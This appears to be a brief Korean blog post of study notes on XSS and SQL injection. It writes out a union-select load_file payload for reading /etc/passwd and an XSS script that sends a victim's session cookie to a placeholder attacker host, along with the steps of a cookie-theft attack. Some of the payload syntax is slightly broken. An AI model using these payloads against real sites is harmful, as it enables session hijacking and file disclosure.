XSS (Cross Site Script)
XSS 취약점은 애플리케이션이 신뢰할 수 없는 데이터를 가져와 적절한 검증이나 제한 없이 웹 브라우저로 보낼 때 발생한다. XSS는 공격자가 피해자의 브라우저에 스크립트를 실행하여 사용자 세션 탈취, 웹 사이트 변조, 악의적인 사이트로 이동할 수 있다.
- 공격(Injection flaws)
mysql> select load file ('/etc/passwd');input) aa' union select load_file('/etc/passwd'),1,1,1,1#
- 반응
Error messages -----[BLOCK]---->Blind SQL Injection - runtime 기반
- 단순 에러메세지
XSS (Cross Site Script)
- XSS 원리
사이트를 이용하는 불특정 다수가 피해
- XSS 과정
- 악성스크립트 업로드
- <script>alert("~"/window.location=href="http://coupang.angel1.com";</script><script>var i = new Image; i.src="http://해커ip/thankyou.php?token="document.cookie;</script>
- Victim 로그인하며 PHPSESSID 발급 -> 쿠키발급 -> SESSIONTOKEN get
- 게시글 읽기
- 악성스크립트 실행
- 이미지파일 실행되는 척하면서 쿠키 유출
- Hacker Web SV; 유출된 쿠키 packet 저장, thankyou.php로 GET TOKEN 설정
2018-10-25
No comments:
Post a Comment